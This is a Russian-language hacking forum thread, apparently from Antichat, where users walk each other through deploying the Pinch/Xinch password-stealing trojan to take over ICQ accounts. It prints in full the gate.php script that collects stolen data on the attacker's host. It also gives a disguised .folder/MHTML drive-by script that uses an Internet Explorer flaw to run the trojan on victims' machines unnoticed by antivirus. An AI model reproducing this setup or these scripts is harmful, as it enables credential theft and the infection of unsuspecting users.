Привет всем !
Сейчас я хочу вам рассказать чему я научился на ачате
Я научился комплить троя для угона аси через http
сейчас я вам расскажу как это сделать:
Что на нужно:
1)Это сам троян пинч\ксинч(но я предпочитаю ксинч) можете скачатьотсюда (http://slil.ru/23616962 )
2)Это сайт поддержкой php возьмем к примеру www.holm.ru
3)gate.php (http://slil.ru/23617241) скачайте этот :)
4)Это TotalCmd (http://fileforum.betanews.com/sendfile/945901171/1/tcmd655a.exe) и желательно Руссификатор (http://flint-inc.ru/Programs/Rus/TotalCmd_655a.rar)
После активации сайта вам прийдет письмо с настройками фтп
это примерно будет выглядить так
Server:xaknyacu.h17.ru
login:xaknyacu7
Password:ErqWEDfs
Потом через Total Commander подключаемся к нашему сайту.
Мы на фтп! Идем в папку WWW и создаем там любую дирректорию. Я создал passi. Далее заходим в папку и вставляем туда gate.php
Потом открываем gate.php
это так:
<?
//CFG
$mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE; //Random reports names
$savetodir = TRUE; //Save rerorts to changed directory
$dirname = "сюда мы пишим ту папку куда будут приходить пароль это (otcheti)"; //Directory name

// a - recepient
// b - subject
// c - message body
// d - file name(not *.php)

//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg = str_replace(" ","+",$_POST['c']);
$var = $_POST['d'];


//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3){

IF($rndatch){
$array = range('a','z');
$c=count($array);
$var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
};

$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
};

//via File
IF($mode == 2 || $mode == 3){

//To dir
IF($savetodir){
@mkdir($dirname);
@chdir($dirname);
}

$vartype=substr($var,-3,3);
IF($vartype == "php") $var.=".saf";

$filename = date('H_i-d.m.Y',time()+3600*6)."_".$ip."_".$var;

$fp=fopen($filename,'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
};
?>

<title>ret_ok</title>
Работа на фтп закончена!

Затем запускаем билдер пинча\хинча. И создаем вирус указав во складке http в форме URL адрес до gate.php!
Это будет где-то как http://xaknyacu.h17.ru/passi/gate.php и ставим галку в поле http
и Комплим вирус
Для открытия отчётов на понадобится passer (http://slil.ru/23603392)
Вот и всё!

Привет всем ребята!
Ребята?



Статейка не чего... но + ща не поставлю...

Очень полезная статейка!!Ужо себе сохранила!=)
КАк токо экзамены кончатся....буду читать твою и devil2007 статьи по троянам))))хыы)))

опять.. сколько можно долбить одну и ту же тему.
Уже наверное сотни статей о настройки пинча) ))

Enk0r
Тем куча насчет этого,но не все статьи продвигаются....и не все их замечают)))

http://forum.antichat.ru/showthread.php?p=241888
http://forum.antichat.ru/thread19273-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html
http://forum.antichat.ru/thread14387-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html
http://forum.antichat.ru/thread14180-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html
http://forum.antichat.ru/thread25177-pinch.html
http://forum.antichat.ru/thread24528-pinch.html
http://forum.antichat.ru/thread27162-pinch.html
http://forum.antichat.ru/thread24564-pinch.html
http://forum.zloy.org/showthread.php?t=7844&highlight=%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7 %E0
Кто ищёт тот всегда найдёт)))

Enk0r
Ого!!Ну ты гониш!!! =) А как быстро то!!Нам на ачате нужно создать раздел.."Секретарь" или "Справочная" и так как ты оч быстро все ищеш...посадить за главноО!!Все кому что нужно будут обращатся к тебе...а ты будеш шарится по всему ачату и с такой же скоростью находить все все линки на эту тему!;)))

неплохо)

YL@']Enk0r
Ого!!Ну ты гониш!!! =) А как быстро то!!Нам на ачате нужно создать раздел.."Секретарь" или "Справочная" и так как ты оч быстро все ищеш...посадить за главноО!!Все кому что нужно будут обращатся к тебе...а ты будеш шарится по всему ачату и с такой же скоростью находить все все линки на эту тему!;)))
Обязательно, так и сделаем)) мне нравится идея))
Для интереса просмотрел другие форумы схожей тематики, надо сказать Античат бьёт все рекорды. Не на одном форуме нет такого количества топиков о пинче.. мда))
/me пошёл писать ещё одну статью о настройке пинча.. ждите.

Enk0r
А главное Античат бьет рекорды по проценты схожих тем!!Ни у кого еще нету...штук 20 созданых топов по одному и тому же)))Ачат рул!!)))

А насчет идеи...ну так вот..ты будеш секретарем...а я твоей помошницей;)))))70 % я беру себе от дохода :р

Пассер архив битый!!!

Это чисто для новичков!!! Но на форуме есть подобные статьи! Нового сдесь нечего нет.

Тема наз. Faq по трою тогда надо было полностью написать про настройку троя, а не выборочно http. Вот хороший пример:
forum.zloy.org/showthread.php?t=7844

ля скоко можно?)))
надо и мне подобную статейку написать

По поводу Пассера
Пассер вместе с ксинчем

моодец статья получилась ничего

мдя... статей дофига... вбил в том же гугле пару вопросов:
Настройка pinch
гейты для pinch
получил целую энциклопедию )

у меня Ксинч не компилится....чего делать?

у меня Ксинч не компилится....чего делать?

Главное не снимать штаны и бегать ;)
---
Короче:
1)Отключи все антивирусы и прочую гадость.
2)Не ставь галки на: Криптовать, проверь стоит у тебя галка на ICO. (PINCH) Если да укажи иконку (в xinch ваще отключи)
3)Ставь все галки

дайте рабочую сцыль на гейт

Друзья! Кто-нибудь слышал о Смертельном скрипте? Прикольная фишка!!! Pinch скрывает напрочть от любых антивирей! Правда одно но... скрипт использует дыру в SP1. Так ыто если на компе жертвы именно он то надо юзать! Кого заинтересовало отпишитесь, расскажу;)

Друзья! Кто-нибудь слышал о Смертельном скрипте? Прикольная фишка!!! Pinch скрывает напрочть от любых антивирей! Правда одно но... скрипт использует дыру в SP1. Так ыто если на компе жертвы именно он то надо юзать! Кого заинтересовало отпишитесь, расскажу;)
расскажи, и ссылку если можно?

Итак смертельный скрипт: (правда тема старая. Идея nsd):
Повторяю еще раз - сей трюк прокатит только на SP1.
Идея состоит вот в чем: если воспользоваться расширением .folder в SP1 то файл отображается как обыкновенная папка! При ее открытии специально подготовленный javascript (надо использовать бреш ослика) запускает тело троя! Причем на эту папку не гавкает антивирус.
Сейчас я подробно расскажу как это сделать...
Сперва создаем текстовый документ, назавем его photo.txt. Далее открываем его в текстовом редакторе и прописываем тэги:
<html>
</html>
Сохраняем. Теперь меняем рассширение файла с .txt на .folder и вуоля! Наш файл файл превращается в папку (в псевдопапку) Попробуем его открыть...О! открывается в IE.
Теперь необходимо подготовить javascript. Возвращаем нашему файлу былую форму-меняем расширение обратно на .txt и помещаем туда следующий скрипт:
<html>//уже прописан
MIME-Version: 1.0

Content-Location:trojan.exe

Content-Transfer-Encoding: mac-binhex40

//сюда мы поместим тело троя в HQX формате(чуть позже как это сделать...)

<title>|</title>
<body bgcolor=blue scroll=no>
<SCRIPT>
function zoh(){
z = document.URL;
p = z.substr(-0,z.lastIndexOf("\\"));
p = unescape(p)
document.write( '<title></title><body scroll=no bgcolor=#000000>

//здесь оставляем пару комментариев жертве на ваш выбор. Можно, например: Кердык тебе!!!!

<object classid="clsid:77777777-7777-7777-7777" codebase="mhtml:'+p+'\\1.folder!trojan.exe" width=1 height=1></object>');
}
// это для того, чтобы обмануть AVP

document.write('');
setTimeout("zoh()",0);
</script>
</html>
Все наш javascript готов! Теперь надо скомпилировать трой, к примеру Pinch v 1.0. Ну думаю тут проблем не будет, так как там на первых страницах уже все есть. Итак скомпилировали...(правда я не пробовал через http, делал через smtp).
Так...далее нам понадобиться утилита binhex, которую можно взять http//www.aladin88.jino-net.ru/tools/binhex.rar
Распаковываем и закидываем её в папку где лежит трой Pinch. Запускаем binhex выбираем нашего трояна (как вы его там назвали) и нажимаем F2. В результате получаем трояна в формате HQX. Открываем его в блокноте и копируем все содержимое (да эти непонятные символы!) и вставляем в скрипт(вместо коменнтария).
Теперь сожраняем и меняем расширение на .folder. Всё наше творение готово! Теперь с улыбкой впариваем его ламеру

---------------------------------------------
Плз, оцените статью:)

у меня проблемка...

итак.. полюзуюсь пинч3 от васьки, хост h18.ru, для управления хостом - SmartFTP

ето мой гейт:
<?
//CFG
$mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = false; //Random reports names
$savetodir = true; //Save reports to changed directory
$dirname = "ot4etu"; //Directory name

// a - recepient
// b - subject
// c - message body
// d - file name (not *.php)

//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']." (".$ip.")";
$msg=str_replace(" ", "+", $_POST['c']);
$var=$_POST['d'];


//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3)
{
IF($rndatch)
{
$array=range('a', 'z');
$c=count($array);
$var=$array[rand(1, $c)].$array[rand(1, $c)].$array[rand(1, $c)].$array[rand(1, $c)].rand(0, 9).rand(0, 9).".bin";
}

$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
}

//via File
IF($mode == 2 || $mode == 3)
{
//To dir
IF($savetodir)
{
@mkdir($dirname);
@chdir($dirname);
}

$vartype=substr($var, -3, 3);
IF($vartype == "php")
$var .= ".saf";

$filename = date('H_i-d.m.Y', time()+3600*6)."_".$ip."_".$var;

$fp=fopen($filename, 'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ret_ok</title>
</head>
<body>
</body>
</html>

ТУТ (http://img409.imageshack.us/img409/250/82693280ao7.gif) скрин с хоста(CMOD раставляю так: WWW-775, passi-777, ot4etu-777, gate.php-666)
ТУТ (http://img409.imageshack.us/img409/4531/52601051dc4.gif) - скрин Билдера

отчети не идут, ненаю что не так.....(перечитал уже наверно все стати рунета по настройке пинча)
антивирус отключен, Билдер через на два мыла работает отлично..
помогите плиз

Напишите настройку пинча и что где вписывать в gate.php! Или сделайте лучше видео как на хост заливать!